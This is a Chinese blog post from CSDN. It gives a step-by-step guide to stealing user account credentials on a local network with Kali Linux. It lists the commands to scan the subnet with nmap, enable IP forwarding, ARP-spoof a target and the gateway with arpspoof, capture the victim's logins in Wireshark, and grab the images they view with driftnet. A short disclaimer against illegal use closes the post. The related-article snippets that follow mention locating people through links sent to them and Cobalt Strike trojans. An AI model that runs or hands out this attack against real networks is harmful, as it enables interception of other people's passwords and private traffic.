kali扫描内网ip_kali内网渗透之盗取用户账号信息

最新推荐文章于 2024-07-22 14:47:45 发布
最新推荐文章于 2024-07-22 14:47:45 发布
阅读量1.5k 收藏 10
点赞数 1
文章标签: kali扫描内网ip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31361715/article/details/111890386
版权

kali内网渗透之盗取用户账号信息(使用的是kali-linux-2020-1a)

一、查看一下自己的ip地址以及网卡信息和子网掩码,可以看到本机的ip地址为192.168.1.109,网卡为eth0

sudo ifconfig

二、利用nmap工具扫描同一局域网内的主机并选择攻击目标,这里我们选择我的另一台电脑 192.168.1.101

nmap -sP 192.168.1.0/24

三、利用ARP欺骗让目标主机的流量经过主机的网卡,再从网关出去,而网关也会把原本流入目标机的流量经过我。

1、在进行arp欺骗之前,我们要先开启本机的IP转发功能,如果不开启的话,我们攻击之后会使目标机断网,而不是欺骗。

echo 1 > /proc/sys/net/ipv4/ip_forward

2、对目标主机进行欺骗,如果没有arpspoof可以使用sudo apt-get install dsniff 安装

sudo apt-get install dsniff

arpspoof -i eth0 -t 192.168.1.101 192.168.1.1

四、使用wireshark抓取经过本机eth0网卡的数据包

五、当被攻击主机访问网站输入用户密码可以在wireshark中找到对应的数据包并取得用户名密码

六、另外做了内网欺骗后还可以截取到目标主机上浏览的图片,是不是很赞!

driftnet -i eth0

最后,此文只是向大家展示一下内网渗透的相关过程,任何人不得用于违法犯罪,否则与本人无关,安全上网,人人有责。

苏远岫
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队内网攻防渗透:内网渗透内网各种工具平台的使用
HACKONE的博客
04-10 223
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
kaliWEB渗透笔记
fhl5203的博客
11-01 5167
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
kali linux中的信息收集姿势
KHOST的博客
08-18 1121
第一章分类 信息收集是从公开可用资源获取所有相关信息的一种方式,是与目标网络和设备交互过程的一部分,涉及开源情报(Open Sourcew Intelligence,OSINT)。在进行渗透测试时信息收集是整个流程的第一步,在实际测试目标网络前进行的,收集的结果会给出需要额外收集的方向或者直接指出接下来在漏洞利用截断可利用的漏洞。信息收集可以分为两种类型:被动侦察(passive reconnaissance)和主动侦察(reconnaissance)。 被动侦察一般是指分析公开的信息,这些信息..
kali Linux:利用漏洞获取目标主机的IP地址
weixin_58023816的博客
12-10 2776
【代码】kali Linux:利用漏洞获取目标主机的IP地址。
如何使用kali来入侵(渗透)一台windows_kali利用win11漏洞
最新发布
2401_85773496的博客
07-22 857
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip
kali 的桥接模式下,查询获取IP地址
m0_74634242的博客
11-12 791
手机热点通常用DHCP服务器来为连接到热点的设备分配IP地址,桥接模式下,虚拟机可以通过与无线网络连接的DHCP服务器获取IP地址,然后手机一般不防御和检查,比如mac地址是否一致,因此Kali虚拟机能够成功获取IP地址。不然ifconfig的结果不变,我是用ifconfig eth0(网卡名) down/up来,关闭和重启网卡。使用ifconfig down/up 前需要加sudo,连上手机热点后,手机热点一般不会限制访问。2.阻止kali获取IP地址。
kali下使用seek追踪定位IP地址(渗透笔记)
weixin_43899811的博客
11-27 2055
在整个实验中,最头疼最无语的还是一开始kali版本选择上的问题,一定要选择kali2023,并且在清华大学镜像源中下载镜像。作为攻击者,我认为这种攻击方式还需要再进一步完善社工方面的问题,例如如何实现手机不提示开启位置功能,如何实现苹果端显示位置,如何不提示该网址是伪装网址等等,值得我们考虑和深思。作为被攻击者,我们一定在日常使用互联网中,不要随意打开陌生链接!那么最后,着重强调:此篇文章仅供技术交流和探讨,严禁利用该手段进行违法行为,出现一切问题后果自负!不足之处敬请批评指正!
kali命令行自动获取ip
星空下de青铜
03-29 7259
简述 我的是最新版kali2020.1a,里面有两块网卡lo(回环)和eth0,但eth0没有开启dhcp,每次切换网络的时候都有点不方便(net的除外) 配置 在这里我们可以看到虚拟机已设置桥接,但物理机与虚拟机网段不一样 进入 /etc/network文件查看并编辑interface文件 原来只有auto lo 和iface lo inet loopback这两行(lo为回环接口) 这里我要...
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_29497981的博客
05-15 1110
记一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
Kali Linux2020 渗透测试指南》配套技术精讲
Ms08067安全实验室
11-10 1226
Kali是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计它的安全性,而且功能极为完备,几乎包含了目前所有的热门工具。Kali的强大功能是毋庸置疑的,它几乎...
内网渗透之-域渗透基础
h4ck0ne的博客
01-23 3631
一 、域环境搭建 + 认识域 + 实验环境 1.前言:    一直想搞内网域渗透,可惜没有遇上好的域环境。看着别人发了多篇域渗透的文章。心里痒痒的 = = 于是乎自己搭建了环境来测试……[这就是屌丝和高富帅的差距啊 从搭建慢慢去学习什么是域。然后再去学习如何域渗透 2.搭建dns+域服务器 各种google和百度以后。终于搭建好域环境 = = 尼玛 居然搭建了许久
Kali Linux渗透测试之信息收集
0nc3的博客
06-18 591
0x00 前言 这是一篇信息收集工具使用学习记录,主要参考《Kali Linux渗透测试技术详解》一书。 虽然觉得Metaspoit挺好用的(小声bb),自带的工具也得了解一下 今天也要加油呀~ 0x01 枚举服务 DNS枚举工具 1.1 DNSenum dnsenum --enum baidu.com 1.2 fierce fierce -dns baidu.com SNMP枚举 2.2 ...
kali下使用seek追踪定位IP地址(渗透笔记)_如何通过链接获取他人ip
2301_79099373的博客
04-07 688
下载完成后,同样解压到当前文件夹。
请问怎么获取对方IP地址
aibi9196的博客
05-26 436
请问怎么获取对方IP地址? 继续阅读《请问怎么获取对方IP地址》的全文内容... 转载于:https://www.cnblogs.com/delphi2007/archive/2009/05/26/1490271.html
kali linux 渗透技术学习笔记 7.信息收集——其他的信息收集手段(二)
Rorschach的博客
05-26 488
Netdiscover Netdiscover用来主动或被动的继续ARP侦查。次工具在不使用DHCP的无线网络中非常有用。(如果不清楚DHCP的话可以自己查一下,或者可以和我在接下来的博客中学习网络工程相关内容)。 首先我们来看一下它的语法格式: netdiscover: invalid option -- '-' Netdiscover 0.5.1 [Active/passive A...
kali找人
undefine
12-18 3076
下面将在kali演示使用seeker和ngrok配合获取点击链接设备的位置,切勿用于非法用途 工具提供 链接:https://pan.baidu.com/s/1Ltj_FTfznDT1C5irVGyXEg 提取码:jing 需要用到两个工具,一个是用来获取对方位置信息的工具,名为seeker 一个是用来进行反向代理的工具,因为kali内网所以需要反向代理才能让两个内网用户链接,名为ngrok 可以去github下载seeker https://github.com/thewhiteh4...
Kali Linux学习笔记---信息收集之被动信息收集
qq_45118881的博客
09-04 308
被动信息收集 nslookup 查询域名IP地址以及子域名 dig 同nslookup但比其功能更强大的是,同域传输,可以查询dns服务器的bind版本(一般不会有)作为入侵点 DNS爆破命令: 1.fierce -dnssersver 8.8.8.8 -dns yzu.edu.cn -wordlist /user/share/fierce/hosts.txt 2.dnsdict6 -d4 -t 16 -u xxx.edu.cn dpkg -L 查找 whois 58.192.131.
Kali-linux其他信息收集手段
2301_77162959的博客
05-14 1215
上面介绍了使用不同的工具以操作步骤的形式进行了信息收集。在Kali中还可以使用一些常规的或非常规方法来收集信息,如使用Recon-NG框架、Netdiscover工具和Shodan工具等。本节将介绍使用这些方法,实现信息收集。
Kali虚拟机采用桥接模式;物理机连接WiFi,Kali中查看网络配置,获取IP地址
cherry70的博客
11-17 3547
防火墙通过控制和检测网络之中的信息交换和访问行为来实现对网络安全的有效管理,在网络间建立一个安全网关,对网络数据进行过滤(允许/拒绝,控制数据包的出,封堵某些禁止行为,提供网络使用状况(网络数据的实时/事后分析及处理,网络数据流动情况的监控分析,通过日志分析,获取时间、地址、协议和流量,网络是否受到监视和攻击),对网络攻击行为进行检测和告警等等,最大限度地防止恶意或非法访问存取,有效的阻止破坏者对计算机系统的破坏,可以最大限度地保证校园网应用服务系统的安全工作。执行该命令后,该网卡将不再使用。
kali linux 获取ip_Kali Linux常用服务配置教程获取IP地址
weixin_34254848的博客
12-28 1184
Kali Linux常用服务配置教程获取IP地址下面以Kali Linux为例,演示获取IP地址的方法(1)设置网络接口为自动获取IP地址。在Kali Linux的收藏夹中单击图标,将显示所有的程序,如图1.8所示。 (2)单击“设置”图标,将打开“设置”窗口,如图1.9所示。 (3)选择“网络”选项,单击有线连接中的齿轮按钮,将显示“有线”对话框,如图1.10所示。 (4)勾选“自动连接”复选...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值